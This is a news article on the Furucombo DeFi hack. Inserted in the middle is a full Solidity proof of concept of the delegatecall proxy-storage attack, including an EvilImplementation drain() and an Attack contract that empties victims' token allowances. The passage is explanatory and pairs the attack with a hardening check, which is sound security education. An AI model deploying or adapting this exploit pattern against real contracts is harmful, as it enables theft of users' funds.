DeFi exploits and attacks have become increasingly commonplace as the space evolves and attracts both money and participants. The latest of these attacks took place today: over $14 million in crypto was stolen.
Furucombo, an Ethereum-based transaction "batching" protocol, announced this morning that the platform had been exploited and asked users to revoke all token approvals granted to it as a precautionary measure.
The tool is designed to let end users assemble DeFi strategies with a simple "drag-and-drop" interface. It enables users who cannot code but understand the DeFi markets to create and execute their own strategies.
The protocol was exploited this morning. "We have deauthorized the relevant components and believe that the vulnerability is patched, but we recommend that users remove approvals out of sheer caution," Furucombo said in a tweet.
According to The Block researcher Igor Igamberdiev, the attacker carried out the exploit by tricking Furucombo's smart contracts into trusting and processing a fake data set belonging to the decentralized lending service Aave, a protocol that allows users to take out collateralized loans (or flash loans without collateral).
"An attacker who used a fake contract made Furucombo believe that Aave v2 has a new implementation," Igamberdiev said in a tweet. As a result, all interactions with "Aave v2" were "approved" and sent to an address controlled by the hacker.
On-chain data also shows that the attacker then drained tokens from every user who had "approved" Furucombo to move funds on their behalf, which is how the total reached over $14 million.
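The mechanism described above, written out as an added illustrative example (this is not Furucombo's or Aave's code; contract and function names such as BatchProxy, LendingPoolProxy, EvilImplementation and drain are hypothetical, and the design is simplified to the pieces that matter). A batching proxy holds users' ERC20 allowances and executes each step of a "combo" with delegatecall against a whitelisted target. If one whitelisted target is itself an upgradeable proxy whose initializer decides "already initialised?" by reading storage, then under delegatecall that check reads and writes the batching proxy's own storage: a single call installs the attacker's "new implementation" there, and the next call through the same target runs the attacker's code with the batching proxy's identity, so every allowance users granted to it is spendable. The hardened flag shows one invariant check that makes the first step revert.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// EIP-1967 implementation slot: bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
bytes32 constant IMPL_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;

// Hypothetical batching proxy in the style the article describes. Users grant it ERC20
// allowances; a batch is a list of whitelisted targets executed via delegatecall, so
// every target's code runs with THIS contract's storage and identity.
contract BatchProxy {
    address public owner;
    mapping(address => bool) public whitelisted;
    bool public immutable hardened;

    constructor(bool _hardened) { owner = msg.sender; hardened = _hardened; }

    // "Deauthorising a component" is simply removing it from the whitelist.
    function setWhitelist(address target, bool ok) external {
        require(msg.sender == owner, "not owner");
        whitelisted[target] = ok;
    }

    function batchExec(address[] calldata targets, bytes[] calldata datas) external {
        require(targets.length == datas.length, "length mismatch");
        address ownerBefore = owner;
        for (uint256 i = 0; i < targets.length; i++) {
            require(whitelisted[targets[i]], "target not whitelisted");
            (bool ok, ) = targets[i].delegatecall(datas[i]);
            require(ok, "call failed");
            if (hardened) {
                // Invariant: a target may never touch this proxy's own control state.
                // With this check, step 1 of the attack below reverts.
                bytes32 slot = IMPL_SLOT;
                address impl;
                assembly { impl := sload(slot) }
                require(impl == address(0) && owner == ownerBefore, "target tampered with proxy storage");
            }
        }
    }
}

// Stand-in for a whitelisted third-party proxy (the article's "Aave v2" entry). Safe when
// called directly; under delegatecall its storage reads and writes land in the caller.
contract LendingPoolProxy {
    function _impl() internal view returns (address impl) {
        bytes32 slot = IMPL_SLOT;
        assembly { impl := sload(slot) }
    }

    function initialize(address newImpl) external {
        require(_impl() == address(0), "already initialised");
        bytes32 slot = IMPL_SLOT;
        assembly { sstore(slot, newImpl) }
    }

    fallback() external payable {
        address impl = _impl();
        require(impl != address(0), "no implementation");
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// The "evil contract". `immutable` values live in code, not storage, so `thief` is
// still the attacker's address when this code runs under delegatecall.
contract EvilImplementation {
    address public immutable thief;
    constructor() { thief = msg.sender; }

    // The token sees msg.sender == BatchProxy, so the victim's allowance TO BatchProxy
    // is what gets spent.
    function drain(address token, address victim, uint256 amount) external {
        require(IERC20(token).transferFrom(victim, thief, amount), "transferFrom failed");
    }
}

// The whole attack in one transaction against an unhardened BatchProxy.
contract Attack {
    function run(BatchProxy proxy, LendingPoolProxy lending, address evil,
                 address token, address victim, uint256 amount) external {
        address[] memory targets = new address[](2);
        bytes[] memory datas = new bytes[](2);
        // Step 1: delegatecalled initialize() finds IMPL_SLOT empty in BatchProxy's storage
        // and writes the attacker's address there: the proxy now "believes the lending
        // pool has a new implementation".
        targets[0] = address(lending);
        datas[0] = abi.encodeWithSelector(LendingPoolProxy.initialize.selector, evil);
        // Step 2: same whitelisted target, unknown selector, so its fallback reads the slot
        // (again from BatchProxy's storage) and delegates to EvilImplementation.drain().
        targets[1] = address(lending);
        datas[1] = abi.encodeWithSelector(EvilImplementation.drain.selector, token, victim, amount);
        proxy.batchExec(targets, datas);
    }
}
```

The per-call invariant is a backstop, not the real fix: a batching proxy should only delegatecall into its own stateless handler contracts, never into arbitrary third-party addresses, and should reach external protocols with a normal call. From the user side, the only durable protection is the one the project itself asked for, revoking allowances granted to the proxy, since an allowance is spendable by whatever code the approved contract ends up running.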
The haul included over 3,900 stETH (a staked-ETH token) and about $2.4 million in the stablecoin USDC. The attacker has since moved the stolen funds through Tornado Cash, a mixer that breaks the on-chain link between the depositing and withdrawing addresses.
Users should be compensated
Hsuan-Ting, the CEO of Dinngo crypto exchange, the company that builds and maintains Furucombo, says the company is taking responsibility for the attack and is asking users not to worry about their losses.
"We are calculating how much was lost," says Hsuan-Ting.
"We will keep everyone up to date. Together we are stronger."
Meanwhile, Julien Bouteloup of Curve Finance said on Twitter that such “evil contracts” exploits are apparently the new “holy grail”.
He is likely referring to previous attacks on Alpha Finance and Pickle Finance, in which a similar "evil contract" pulled millions of dollars in cryptocurrencies by getting the protocols to approve and accept bogus contracts.
At that time, however, the projects were able to avert further damage.